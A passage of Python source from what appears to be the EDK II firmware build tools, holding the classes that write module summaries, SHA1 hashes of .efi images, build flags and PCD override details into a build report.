# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
for Name, Guid in StructPcdDict:
if (Name, Guid) not in Pa.Platform.Pcds:
Pcd = StructPcdDict[(Name, Guid)]
PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
len(PcdValue) > 1 and PcdValue.lstrip('0'):
PcdValue = PcdValue.lstrip('0')
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
DecDefaultValue = DecDefaultValue.lstrip('0')
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
InfDefaultValue = InfDefaultValue.lstrip('0')
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
DscDefaultValue = DscDefaultValue.lstrip('0')
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
ModuleDefault = ModuleDefault.lstrip('0')
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
else:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
